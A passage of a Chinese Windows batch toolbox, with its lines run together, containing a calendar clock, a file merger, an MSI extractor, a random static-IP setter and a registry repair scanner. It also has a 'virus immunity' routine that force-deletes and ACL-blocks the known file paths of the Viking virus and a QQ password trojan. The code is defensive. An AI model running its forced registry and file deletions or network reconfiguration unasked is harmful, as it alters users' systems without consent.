equ 03 (set yue=  三月大)if %y% equ 04 (set yue=  四月小)if %y% equ 05 (set yue=  五月大)if %y% equ 06 (set yue=  六月小)if %y% equ 07 (set yue=  七月大)if %y% equ 08 (set yue=  八月大)if %y% equ 09 (set yue=  九月小)if %y% equ 10 (set yue=  十月大)if %y% equ 11 (set yue=十一月小)if %y% equ 12 (set yue=十二月大)set ra=%r:~0,-1%set rb=%r:~1,1%if %ra% equ 0 (set rc=yif %rb% equ 1 (set r1=      █      set r2=    ██      set r3=      █      set r4=      █      set r5=      █      set r6=      █      set r7=      █      set r8=   ████   )if %rb% equ 2 (set r1=     ██     set r2=   █    █   set r3=          █  set r4=         █   set r5=        █    set r6=      █      set r7=    █        set r8=   ████   )if %rb% equ 3 (set r1=     ██     set r2=   █    █   set r3=        █    set r4=      █      set r5=        █    set r6=   █    █   set r7=     ██     set r8=              )if %rb% equ 4 (set r1=       █     set r2=      █▌    set r3=     ██     set r4=    █ █     set r5=   █  █     set r6=  █████  set r7=       █     set r8=       █     )if %rb% equ 5 (set r1=    ███    set r2=    █        set r3=    █        set r4=    ███    set r5=        █    set r6=        █    set r7=    ███    set r8=              )if %rb% equ 6 (set r1=       █     set r2=     █       set r3=    █        set r4=   █ █▋    set r5=   █▌  █   set r6=   █    █   set r7=    █  █    set r8=      █      )if %rb% equ 7 (set r1=  █████  set r2=          █  set r3=         █   set r4=        █    set r5=       █     set r6=      █      set r7=     █       set r8=    █        )if %rb% equ 8 (set r1=     ██     set r2=   █    █   set r3=   █    █   set r4=     ██     set r5=   █    █   set r6=   █    █   set r7=     ██     set r8=              )if %rb% equ 9 (set r1=     ██     set r2=   █    █   set r3=   █    █   set r4=     ██     set r5=         █   set r6=   █    █   set r7=     ██     set r8=              )) else (if %rb% equ 0 (set r9 =███set r10=█  █set r11=█  █set r12=█  █set r13=█  █set r14=█  █set r15=███set r16=      )if %rb% equ 1 (set r9 =  █  set r10=  █  set r11=  █  set r12=  █  set r13=  █  set r14=  █  set r15=  █  set r16=      )if %rb% equ 2 (set r9 =███set r10=    █set r11=    █set r12=███set r13=█    set r14=█    set r15=███set r16=      )if %rb% equ 3 (set r9 =███set r10=    █set r11=    █set r12=███set r13=    █set r14=    █set r15=███set r16=      )if %rb% equ 4 (set r9 =█  █set r10=█  █set r11=█  █set r12=███set r13=    █set r14=    █set r15=    █set r16=      )if %rb% equ 5 (set r9 =███set r10=█    set r11=█    set r12=███set r13=    █set r14=    █set r15=███set r16=      )if %rb% equ 6 (set r9 =███set r10=█    set r11=█    set r12=███set r13=█  █set r14=█  █set r15=███set r16=      )if %rb% equ 7 (set r9 =███set r10=█  █set r11=    █set r12=    █set r13=    █set r14=    █set r15=    █set r16=      )if %rb% equ 8 (set r9 =███set r10=█  █set r11=█  █set r12=███set r13=█  █set r14=█  █set r15=███set r16=      )if %rb% equ 9 (set r9 =███set r10=█  █set r11=█  █set r12=███set r13=    █set r14=    █set r15=███set r16=      ))if %ra% equ 1 (set r1=  █  set r2=  █  set r3=  █  set r4=  █  set r5=  █  set r6=  █  set r7=  █  set r8=      )if %ra% equ 2 (set r1=███set r2=    █set r3=    █set r4=███set r5=█    set r6=█    set r7=███set r8=      )if %ra% equ 3 (set r1=███set r2=    █set r3=    █set r4=███set r5=    █set r6=    █set r7=███set r8=      )if not defined rc (set r1=%r1%  %r9 %set r2=%r2%  %r10%set r3=%r3%  %r11%set r4=%r4%  %r12%set r5=%r5%  %r13%set r6=%r6%  %r14%set r7=%r7%  %r15%set r8=%r8%  %r16%) else (cls):cf2-gn---6set sj=%time:~0,-9%时%time:~3,-6%分%time:~6,-3%秒clsecho.echo. ┌────────────────┐echo. │%n%年     日历时钟     %yue%│echo. ├────────────────┤echo. │%sj%                    │echo. │星期%xq%                          │echo. │         %r1%         │echo. │         %r2%         │echo. │         %r3%         │echo. │         %r4%         │echo. │         %r5%         │echo. │         %r6%         │echo. │         %r7%         │echo. │         %r8%         │echo. ├────────────────┤echo. │          作者：Dr.ma           │echo. └────────────────┘echo   节日：%abc%ping 127.1 -n 2 >nulgoto gn---6-cf:hbmp3zbtitle 合并文件:main23mode con cols=31 lines=12cls&set file=echo \"        _______             \"echo \"       / file  |            \"echo \"       |::::   |   DRAG     \"echo \"       | ::::  |   HERE     \"echo \"       |  :::: |            \"echo \"       |_______|            \"echo.echo  请拖入欲合并的文件到此窗口echo  然后按“回车”(Enter)。（用echo  “+”隔开）set /p file=if '%file%'=='' goto main23:wind23cls&set file2=echo \"        _______             \"echo \"       / file  |            \"echo \"       |::::   |   DRAG     \"echo \"       | ::::  |   HERE     \"echo \"       |  :::: |            \"echo \"       |_______|            \"echo.echo.echo  请输入保存名称（格式：c:\\ma.*echo   ）然后按“回车”(Enter)set /p file2=if '%file2%'=='' goto wind23:star23clsecho.echo.echo 合并中……copy /b %file% %file2% >nul 2>nulecho 完成！按任意键返回……pause>nulgoto _max:hbbsbsbcd /d %~dp0title ExtractMSI v2 修订版set time=0:mainmode con cols=31 lines=10if not \"%~1\"==\"\" set file=%~1&& goto specialcls&set file=echo \"        _______             \"echo \"       / MSI   |            \"echo \"       |::::   |   DRAG     \"echo \"       | ::::  |   HERE     \"echo \"       |  :::: |            \"echo \"       |_______|            \"echo.echo  请拖入欲解压的MSI文件到此窗口echo  然后按“回车”(Enter)。set /p file=:checkfileif not exist \"%file%\" set error=file&&goto errorcall :get %file%if \"%x%\"==\".msi\" (goto extract) else (set error=msi)goto error:extractset select=clsmode con cols=60 lines=15echo.echo  本软件猜你要解压echo  %nx%&echo.echo  到：echo  %guess%&echo.echo  直接回车以采用以上路径&echo.set /p select=→if \"%select%\"==\"\" set target=%guess%&&goto confirm:guessagaincls&set select2=echo.&echo  我猜我猜我猜猜猜…… 你的意思是解压到……echo.&echo  1-%dp%%select%&echo.&echo  2-%d%\\%select%echo.&echo  .-返回   ..-重新选择文件&echo.set /p select2=选择→if \"%select2%\"==\"1\" set target=%dp%%select%&&goto confirmif \"%select2%\"==\"2\" set target=%d%\\%select%&&goto confirmif \"%select2%\"==\".\" goto extractif \"%select2%\"==\"..\" goto maingoto guessagain:errorclsecho 别玩了，这是什么玩意儿~echo.if \"%error%\"==\"msi\" echo 只可以拖入msi文件！if \"%error%\"==\"file\" echo 文件根本不存在！pause>nulgoto main:getset d=%~d1set x=%~x1set n=%~n1set nx=%~nx1set dp=%~dp1set guess=%~dpn1exit /b:confirmclsecho.&echo  最后确认&echo.&echo  解压%nx%echo.&echo  到%target%echo.&echo  ,- 确定   .- 返回&echo.set /p select=if \"%select%\"==\",\" goto processif \"%select%\"==\".\" goto extractgoto confirm:processmode con cols=31 lines=10set file=%file:\"=%clsecho.&echo  已调用msiexec.exe来解压，echo  如果看不见请等一会儿。&echo.msiexec.exe /a \"%file%\" /qb targetdir=\"%target%\"if exist \"%target%\" (echo  应该可以了，按任意键去看看吧~) else (echo  你似乎取消了…… 任意键退出)pause>nulif exist \"%target%\" explorer \"%target%\"exit:specialcall :get \"%file%\"if \"%x%\"==\".msi\" (goto extract) else (set error=msi)goto errorgoto _max:Zzdszipecho 正在为您设置IP，请稍等......set /A \"a=%RANDOM%%%250+3set /A \"b=%RANDOM%%%250+3set /A \"c=%RANDOM%%%250+3netsh interface ip set address name=\"本地连接\" source=static addr=10.%a%.%b%.%c% mask=255.0.0.0 >nul:startset /A \"num=%RANDOM%%%190+10\"ping 10.1.1.%num% -n 1 >nularp -a |find \"10.1.1.%num%\" &&goto startnetsh interface ip set address name=\"本地连接\" source=static addr=10.1.1.%num% mask=255.255.255.0 gateway=10.1.1.250 gwmetric=0 | find \"IP地址已在网络上使用\" &&goto startnetsh interface ip set dns \"本地连接\" source=static addr=10.1.1.100 register=primary >nul netsh interface ip add dns \"本地连接\" addr=8.8.8.8 >nulnetsh interface ip set wins name=\"本地连接\" source=static addr=10.1.1.100 >nulif %errorlevel% neq 0 goto startgoto _max:Registry_ScanTitle 注册表扫描mode con cols=80 lines=15clsecho.echo.echo        正 在 扫 描echo.echo                                              请稍后......echo.echo.set a=^set /p= ■%b%^<nul^&ping/n 0 127.1^>nul^&set/p=    <nul&&%e%%a%%a%set /a NO._Abnormal=0,NO._Succeed=0,NO._Fail=0set RExplorer=\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\"set RSystem=\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\"set RIE=\"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\"set RIER=\"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\"set/p=<nul&&%a%%a%reg query %RExplorer%>nul 2>nulif %errorlevel%==0 (    for %%e in (        LockTaskbar        NoChangeStartMenu        NoSetTaskbar        StartMenuLogOff        NoRun        NoFind        NoSetFolders        NoClose        NoRecentDocsMenu        NoSMHelp        Start_ShowControlPanel        Start_ShowMyComputer        NoSMMyDocs        NoStartMenuMyMusic        NoSMMyPictures        Start_ShowNetConn        NoStartMenuMorePrograms        NoStartMenuMFUProgramsList        NoPropertiesMyComputer        NoManageMyComputerVerb        NoPropertiesMyDocuments        NoInternetIcon        NoShellSearchButton        NoTrayItemsDisplay        HideClock        NoWinKeys        NoViewContextMenu        NoExpandedNewMenu        NoBandCustomize    ) do (        set v%%e=正常        set dv%%e=不需要        for /f \"tokens=3\" %%i in ('reg query %RExplorer%^|findstr /i %%e') do (            if \"%%i\"==\"0x1\" (                set v%%e=异常                set /a NO._Abnormal+=1                reg delete %RExplorer% /v %%e /f>nul                if %errorlevel%==1  (                    set dv%%e=  ×                    set /a NO._Fail+=1                )                if %errorlevel%==0 (                    set dv%%e=  √                    set /a NO._Succeed+=1                )            )        )    ))set/p=<nul&&%a%%a%reg query %RExplorer%>nul 2>nulif %errorlevel%==0 (    for %%d in (        Noviewondrive        NoDrives    ) do (        set v%%d=正常        set dv%%d=不需要        for /f \"tokens=3\" %%i in ('reg query %RExplorer%^|findstr /i %%d') do (            if \"%%i\"==\"0x1\" (                set v%%d=异常                set /a NO._Abnormal+=1                reg delete %RExplorer% /v %%d /f>nul                if %errorlevel%==1  (                    set dv%%e=  ×                    set /a NO._Fail+=1                )                if %errorlevel%==0 (                    set dv%%e=  √                    set /a NO._Succeed+=1                )            )        )    ))set/p=<nul&&%a%%a%%a%%a%%a%%a%reg query %RSystem%>nul 2>nulif %errorlevel%==0 (    for %%s in (        NoDispBackgroundPage        NoDispAppearancePage        NoDispSettingsPage        NoDispScrSavPage    ) do (        set v%%s=正常        set dv%%s=不需要        for /f \"tokens=3\" %%i in ('reg query %RSystem%^|findstr /i %%s') do (            if \"%%i\"==\"0x1\" (                set v%%s=异常                set /a NO._Abnormal+=1                reg delete %RSystem% /v %%s /f>nul                if %errorlevel%==1  (                    set dv%%s=  ×                    set /a NO._Fail+=1                )                if %errorlevel%==0 (                    set dv%%s=  √                    set /a NO._Succeed+=1                )            )        )    ))set/p=<nul&&%a%%a%reg query %RIE%>nul 2>nulif %errorlevel%==0 (    for %%n in (        GeneralTab        SecurityTab        PrivacyTab        ContentTab        ConnectionsTab        ProgramsTab        AdvancedTab        HomePage        cache        settings        history        colour        fonts        languages        accessibility        Advanced    ) do (        set v%%n=正常        set dv%%n=不需要        for /f \"tokens=3\" %%i in ('reg query %RIE%^|findstr /i %%n') do (            if \"%%i\"==\"0x1\" (                set v%%n=异常                set /a NO._Abnormal+=1                reg delete %RIE% /v %%n /f>nul                if %errorlevel%==1  (                    set dv%%n=  ×                    set /a NO._Fail+=1                )                if %errorlevel%==0 (                    set dv%%n=  √                    set /a NO._Succeed+=1                )            )        )    ))set/p=<nul&&%a%%a%%a%%a%reg query %RIER%>nul 2>nulif %errorlevel%==0 (    for %%m in (        NoFileOpen        NoBrowserClose        NoFileNew        NoViewSouree        NoTheaterMode        NoBrowserOptions    ) do (        set v%%m=正常        set dv%%m=不需要        for /f \"tokens=3\" %%i in ('reg query %RIER%^|findstr /i %%m') do (            if \"%%i\"==\"0x1\" (                set v%%m=异常                set /a NO._Abnormal+=1                reg delete %RIER% /v %%m /f>nul                if %errorlevel%==1  (                    set dv%%m=  ×                    set /a NO._Fail+=1                )                if %errorlevel%==0 (                    set dv%%m=  √                    set /a NO._Succeed+=1                )            )        )    ))set/p=<nul&&%a%%a%set dvexe=不需要set dvbat=不需要set dvtxt=不需要set dvini=不需要set dvvbs=不需要set dvcom=不需要for /f \"tokens=3\" %%i in ('reg query \"HKEY_CLASSES_ROOT\\.exe\" ^| find /i \"没有名称\"') do (    if \"%%i\"==\"exefile\" (        set vexe=正常    ) else (        set vexe=异常        set /a NO._Abnormal+=1        assoc .exe=exefile>nul        if %errorlevel%==1  (            set dvexe=  ×            set /a NO._Fail+=1        )        if %errorlevel%==0 (            set dvexe=  √            set /a NO._Succeed+=1        )    ))set/p=<nul&&%a%%a%for /f \"tokens=3\" %%i in ('reg query \"HKEY_CLASSES_ROOT\\.bat\" ^| find /i \"没有名称\"') do (    if \"%%i\"==\"batfile\" (        set vbat=正常        ) else (        set vbat=异常        set /a NO._Abnormal+=1        assoc .bat=batfile>nul        if %errorlevel%==1  (            set dvbat=  ×            set /a NO._Fail+=1        )        if %errorlevel%==0 (            set dvbat=  √            set /a NO._Succeed+=1        )    ))set/p=<nul&&%a%%a%for /f \"tokens=3\" %%i in ('reg query \"HKEY_CLASSES_ROOT\\.txt\" ^| find /i \"没有名称\"') do (    if \"%%i\"==\"txtfile\" (        set vtxt=正常        ) else (        set vtxt=异常        set /a NO._Abnormal+=1        assoc .txt=txtfile>nul        if %errorlevel%==1  (            set dvtxt=  ×            set /a NO._Fail+=1        )        if %errorlevel%==0 (            set dvtxt=  √            set /a NO._Succeed+=1        )    ))set/p=<nul&&%a%%a%    for /f \"tokens=3\" %%i in ('reg query \"HKEY_CLASSES_ROOT\\.ini\" ^| find /i \"没有名称\"') do (        if \"%%i\"==\"inifile\" (        set vini=正常        ) else (        set vini=异常        set /a NO._Abnormal+=1        assoc .ini=inifile>nul        if %errorlevel%==1  (            set dvini=  ×            set /a NO._Fail+=1        )        if %errorlevel%==0 (            set dvini=  √            set /a NO._Succeed+=1        )    ))set/p=<nul&&%a%%a%for /f \"tokens=3\" %%i in ('reg query \"HKEY_CLASSES_ROOT\\.vbs\" ^| find /i \"没有名称\"') do (    if \"%%i\"==\"vbsfile\" (    set vvbs=正常    ) else (        set vvbs=异常        set /a NO._Abnormal+=1        assoc .vbs=vbsfile>nul        if %errorlevel%==1  (            set dvvbs=  ×            set /a NO._Fail+=1        )        if %errorlevel%==0 (            set dvvbs=  √            set /a NO._Succeed+=1        )    ))set/p=<nul&&%a%%a%for /f \"tokens=3\" %%i in ('reg query \"HKEY_CLASSES_ROOT\\.com\" ^| find /i \"没有名称\"') do (    if \"%%i\"==\"comfile\" (    set vcom=正常    ) else (        set vcom=异常        set /a NO._Abnormal+=1        assoc .com=comfile>nul        if %errorlevel%==1  (            set dvcom=  ×            set /a NO._Fail+=1        )        if %errorlevel%==0 (            set dvcom=  √            set /a NO._Succeed+=1        )    ))set/p=<nul&&%a%%a%echo.echo.echo.echo   任意键查看扫描结果   （仅显示 异常 项目）pause>nulclsecho            注 册 表 项 目                   状 态          修 复echo = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =echo.if \"%vLockTaskbar%\"==\"异常\" (echo. && echo          任务栏的修改锁定                   %vLockTaskbar%          %dvLockTaskbar%)if \"%vNoChangeStartMenu%\"==\"异常\" (echo. && echo     “开始”菜单中的修改锁定                %vNoChangeStartMenu%          %dvNoChangeStartMenu%)if \"%vNoSetTaskbar%\"==\"异常\" (echo. && echo         菜单设置修改锁定                    %vNoSetTaskbar%          %dvNoSetTaskbar%)if \"%vStartMenuLogOff%\"==\"异常\" (echo. && echo    “开始”菜单中的“注销”项               %vStartMenuLogOff%          %dvStartMenuLogOff%)if \"%vNoRun%\"==\"异常\" (echo. && echo     “开始”菜单中的“运行”项              %vNoRun%          %dvNoRun%)if \"%vNoFind%\"==\"异常\" (echo. && echo    “开始”菜单中的“查找”项               %vNoFind%          %dvNoFind%)if \"%vNoSetFolders%\"==\"异常\" (echo. && echo    “开始”菜单中的“设置”项               %vNoSetFolders%          %dvNoSetFolders%)if \"%vNoRecentDocsMenu%\"==\"异常\" (echo. && echo  “开始”菜单中的“我最近的文档”项         %vNoRecentDocsMenu%          %dvNoRecentDocsMenu%)if \"%vNoSMHelp%\"==\"异常\" (echo. && echo   “开始”菜单中的“帮助和支持”项          %vNoSMHelp%          %dvNoSMHelp%)if \"%vStart_ShowControlPanel%\"==\"异常\" (echo. && echo    “开始”菜单中的“控制面板”项           %vStart_ShowControlPanel%          %dvStart_ShowControlPanel%)if \"%vStart_ShowMyComputer%\"==\"异常\" (echo. && echo    “开始”菜单中的“我的电脑”项           %vStart_ShowMyComputer%          %dvStart_ShowMyComputer%)if \"%vNoSMMyDocs%\"==\"异常\" (echo. && echo    “开始”菜单中的“我的文档”项           %vNoSMMyDocs%          %dvNoSMMyDocs%)if \"%vNoStartMenuMyMusic%\"==\"异常\" (echo. && echo    “开始”菜单中的“我的音乐”项           %vNoStartMenuMyMusic%          %dvNoStartMenuMyMusic%)if \"%vNoSMMyPictures%\"==\"异常\" (echo. && echo    “开始”菜单中的“我的图片”项           %vNoSMMyPictures%          %dvNoSMMyPictures%)if \"%vStart_ShowNetConn%\"==\"异常\" (echo. && echo    “开始”菜单中的“网上邻居”项           %vStart_ShowNetConn%          %dvStart_ShowNetConn%)if \"%vNoStartMenuMorePrograms%\"==\"异常\" (echo. && echo    “开始”菜单中的“所有程序”项           %vNoStartMenuMorePrograms%          %dvNoStartMenuMorePrograms%)if \"%vNoStartMenuMFUProgramsList%\"==\"异常\" (echo. && echo    “开始”菜单中的“程序列表”项           %vNoStartMenuMFUProgramsList%          %dvNoStartMenuMFUProgramsList%)if \"%vNoPropertiesMyComputer%\"==\"异常\" (echo. && echo    “我的电脑”右键“属性”                 %vNoPropertiesMyComputer%          %dvNoPropertiesMyComputer%)if \"%vNoManageMyComputerVerb%\"==\"异常\" (echo. && echo    “我的电脑”右键“管理”                 %vNoManageMyComputerVerb%          %dvNoManageMyComputerVerb%)if \"%vNoPropertiesMyDocuments%\"==\"异常\" (echo. && echo    “我的文档”右键“属性”                 %vNoPropertiesMyDocuments%          %dvNoPropertiesMyDocuments%)if \"%vNoInternetIcon%\"==\"异常\" (echo. && echo             桌面IE图标                      %vNoInternetIcon%          %dvNoInternetIcon%)if \"%vNoShellSearchButton%\"==\"异常\" (echo. && echo  “资源管理器”中的“搜索”按钮             %vNoShellSearchButton%          %dvNoShellSearchButton%)if \"%vNoTrayItemsDisplay%\"==\"异常\" (echo. && echo           系统托盘图标                      %vNoTrayItemsDisplay%          %dvNoTrayItemsDisplay%)if \"%vHideClock%\"==\"异常\" (echo. && echo          系统通知区域时钟                   %vHideClock%          %dvHideClock%)if \"%vNoWinKeys%\"==\"异常\" (echo. && echo             WinKeys键                       %vNoWinKeys%          %dvNoWinKeys%)if \"%vNoViewContextMenu%\"==\"异常\" (echo. && echo             桌面右键                        %vNoViewContextMenu%          %dvNoViewContextMenu%)if \"%vNoExpandedNewMenu%\"==\"异常\" (echo. && echo     “文件”中的“新建”命令                %vNoExpandedNewMenu%          %dvNoExpandedNewMenu%)if \"%vNoBandCustomize%\"==\"异常\" (echo. && echo    “查看”中的“工具栏”命令               %vNoBandCustomize%          %dvNoBandCustomize%)if \"%vNoDrives%\"==\"异常\" (echo. &&echo              隐藏盘符                       %vNoDrives%          %dvNoDrives%)if \"%vNoviewondrive%\"==\"异常\" (echo. &&echo            禁止访问盘符                     %vNoviewondrive%          %dvNoviewondrive%)if \"%vNoDispBackgroundPage%\"==\"异常\" (echo. && echo         对话框中“背景”选项                %vNoDispBackgroundPage%          %dvNoDispBackgroundPage%)if \"%vNoDispAppearancePage%\"==\"异常\" (echo. && echo         对话框中“外观”选项                %vNoDispAppearancePage%          %dvNoDispAppearancePage%)if \"%vNoDispSettingsPage%\"==\"异常\" (echo. && echo         对话框中“设置”选项                %vNoDispSettingsPage%          %dvNoDispSettingsPage%)if \"%vNoDispScrSavPage%\"==\"异常\" (echo. && echo       对话框中“屏幕保护”选项              %vNoDispScrSavPage%          %dvNoDispScrSavPage%)if \"%vGeneralTab%\"==\"异常\" (echo. && echo   “Internet选项”中的“常规”项            %vGeneralTab%          %dvGeneralTab%)if \"%vSecurityTab%\"==\"异常\" (echo. && echo   “Internet选项”中的“安全”项            %vSecurityTab%          %dvSecurityTab%)if \"%vPrivacyTab%\"==\"异常\" (echo. && echo   “Internet选项”中的“隐私”项            %vPrivacyTab%          %dvPrivacyTab%)if \"%vContentTab%\"==\"异常\" (echo. && echo   “Internet选项”中的“内容”项            %vContentTab%          %dvContentTab%)if \"%vConnectionsTab%\"==\"异常\" (echo. && echo   “Internet选项”中的“连接”项            %vConnectionsTab%          %dvConnectionsTab%)if \"%vProgramsTab%\"==\"异常\" (echo. && echo   “Internet选项”中的“程序”项            %vProgramsTab%          %dvProgramsTab%)if \"%vAdvancedTab%\"==\"异常\" (echo. && echo   “Internet选项”中的“高级”项            %vAdvancedTab%          %dvAdvancedTab)if \"%vHomePage%\"==\"异常\" (echo. && echo             IE首页锁定                      %vHomePage%          %dvHomePage%)if \"%vcache%\"==\"异常\" (echo. && echo             IE临时文件                      %vcache%          %dvcache%)if \"%vsettings%\"==\"异常\" (echo. && echo           IE“设置”按钮                    %vsettings%          %dvsettings%)if \"%vhistory%\"==\"异常\" (echo. && echo       IE“清除历史纪录”按钮                %vhistory%          %dvhistory%)if \"%vcolour%\"==\"异常\" (echo. && echo           IE“颜色”按钮                    %vcolour%          %dvcolour%)if \"%vfonts%\"==\"异常\" (echo. && echo           IE“字体”按钮                    %vfonts%          %dvfonts%)if \"%vlanguages%\"==\"异常\" (echo. && echo           IE“语言”按钮                    %vlanguages%          %dvlanguages%)if \"%vaccessibility%\"==\"异常\" (echo. && echo          IE“辅助功能”按钮                 %vaccessibility%          %dvaccessibility%)if \"%vNoFileOpen%\"==\"异常\" (echo. && echo     IE“文件”中的“打开”命令               %vNoFileOpen%          %dvNoFileOpen%)if \"%vNoBrowserClose%\"==\"异常\" (echo. && echo     IE“文件”中的“关闭”命令               %vNoBrowserClose%          %dvNoBrowserClose%)if \"%vNoFileNew%\"==\"异常\" (echo. && echo  IE“文件”中的“打开新窗口”命令            %vNoFileNew%          %dvNoFileNew%)if \"%vNoFileNew%\"==\"异常\" (echo. && echo    IE“查看”中的“源文件”命令              %vNoFileNew%          %dvNoFileNew%)if \"%vNoTheaterMode%\"==\"异常\" (echo. && echo   IE“查看”中的“全屏显示”命令             %vNoTheaterMode%          %dvNoTheaterMode%)if \"%vNoBrowserOptions%\"==\"异常\" (echo. && echo  IE“工具”中的“Internet选项”命令               %vNoBrowserOptions%          %dvNoBrowserOptions%)if \"%vexe%\"==\"异常\" (echo. && echo            exe文件关联                      %vexe%          %dvexe%)if \"%vbat%\"==\"异常\" (echo. && echo            bat文件关联                      %vbat%          %dvbat%)if \"%vtxt%\"==\"异常\" (echo. && echo            txt文件关联                      %vtxt%          %dvtxt%)if \"%vini%\"==\"异常\" (echo. && echo            ini文件关联                      %vini%          %dvini%)if \"%vvbs%\"==\"异常\" (echo. && echo            vbs文件关联                      %vvbs%          %dvvbs%)if \"%vcom%\"==\"异常\" (echo. && echo            com文件关联                      %vcom%          %dvcom%)echo.echo = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =echo.echo  统计   扫描：61 项      异常：%NO._Abnormal% 项     修复成功：%NO._Succeed% 项     修复失败：%NO._Fail% 项echo.echo.echo                                 任意键返回主菜单pause>nulgoto _max:Virus_ImmuneclsTitle 病毒免疫工具set /a NO.=0echo.echo.echo                    通过echo.echo         畸形文件夹  和  访问控制列表echo.echo             达到免疫病毒的作用echo.echo                任意键继续pause>nul::威金病毒if exist \"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DAT\" del /f/s/q\"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DAT\">nul 2>nulmd \"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DAT\\病毒免疫（威金病毒）\"md \"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DAT\\病毒免疫（威金病毒）\\病毒免疫..\\\"attrib \"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DAT、病毒免疫（威金病毒）\" +S +R +Hcacls \"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DAT\\病毒免疫（威金病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DLL\" del /f/s/q \"C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\06E3DD06.DLL\">nul 2>nulmd \"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DLL\\病毒免疫（威金病毒）\"md \"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DLL\\病毒免疫（威金病毒）\\病毒免疫..\\\"attrib \"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DLL\\病毒免疫（威金病毒）\" +S +R +Hcacls \"%commonprogramfiles%\\Microsoft Shared\\MSInfo\\06E3DD06.DLL\\病毒免疫（威金病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%systemroot%\\HELP\\06E3DD06.CHM\" del /f/s/q \"%systemroot%\\HELP\\06E3DD06.CHM\">nul 2>nulmd \"%systemroot%\\HELP\\06E3DD06.CHM\\病毒免疫（威金病毒）\"md \"%systemroot%\\HELP\\06E3DD06.CHM\\病毒免疫（威金病毒）\\病毒免疫..\\\"attrib \"%systemroot%\\HELP\\06E3DD06.CHM\\病毒免疫（威金病毒）\" +S +R +Hcacls \"%systemroot%\\HELP\\06E3DD06.CHM\\病毒免疫（威金病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%SystemRoot%\\rundl132.exe\" del /f/s/q \"%SystemRoot%\\rundl132.exe\">nul 2>nulmd \"%SystemRoot%\\rundl132.exe\\病毒免疫（威金病毒）\"md \"%SystemRoot%\\rundl132.exe\\病毒免疫（威金病毒）\\病毒免疫..\\\"attrib \"%SystemRoot%\\rundl132.exe\\病毒免疫（威金病毒）\" +S +R +Hcacls \"%SystemRoot%\\rundl132.exe\\病毒免疫（威金病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%SystemRoot%\\logo_1.exe\" del /f/s/q \"%SystemRoot%\\logo_1.exe\">nul 2>nulmd \"%SystemRoot%\\logo_1.exe\\病毒免疫（威金病毒）\"md \"%SystemRoot%\\logo_1.exe\\病毒免疫（威金病毒）\\病毒免疫..\\\"attrib \"%SystemRoot%\\logo_1.exe\\病毒免疫（威金病毒）\" +S +R +Hcacls \"%SystemRoot%\\logo_1.exe\\病毒免疫（威金病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%SystemRoot%\\Sy.exe\" del /f/s/q \"%SystemRoot%\\Sy.exe\">nul 2>nulmd \"%SystemRoot%\\Sy.exe\\病毒免疫（威金病毒）\"md \"%SystemRoot%\\Sy.exe\\病毒免疫（威金病毒）\\病毒免疫..\\\"attrib \"%SystemRoot%\\Sy.exe\\病毒免疫（威金病毒）\" +S +R +Hcacls \"%SystemRoot%\\Sy.exe\\病毒免疫（威金病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1for /l %%i in (0,1,9) do (    if exist \"%SystemRoot%\\%%iSy.exe\" del /f/s/q \"%SystemRoot%\\%%iSy.exe\">nul 2>nul    md \"%SystemRoot%\\%%iSy.exe\\病毒免疫（威金病毒）\"    md \"%SystemRoot%\\%%iSy.exe\\病毒免疫（威金病毒）\\病毒免疫..\\\"    attrib \"%SystemRoot%\\%%iSy.exe\\病毒免疫（威金病毒）\" +S +R +H    cacls \"%SystemRoot%\\%%iSy.exe\\病毒免疫（威金病毒）\" /d everyone /e>nul 2>nul    set /a NO.+=1)::Trojan-PSW.Win32.QQPass.vm病毒if exist \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.bak\" del /f/s/q \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.bak\">nul 2>nulmd \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.bak\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\"md \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.bak\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\\病毒免疫..\\\"attrib \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.bak\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" +S +R +Hcacls \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.bak\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.sys\" del /f/s/q \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.sys\">nul 2>nulmd \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.sys\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\"md \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.sys\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\\病毒免疫..\\\"attrib \"%programfiles%\\Internet Explorer\\PLUGINS\\SystemKb.sys\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" +S +R +Hcacls \"%programfiles%\\Internet 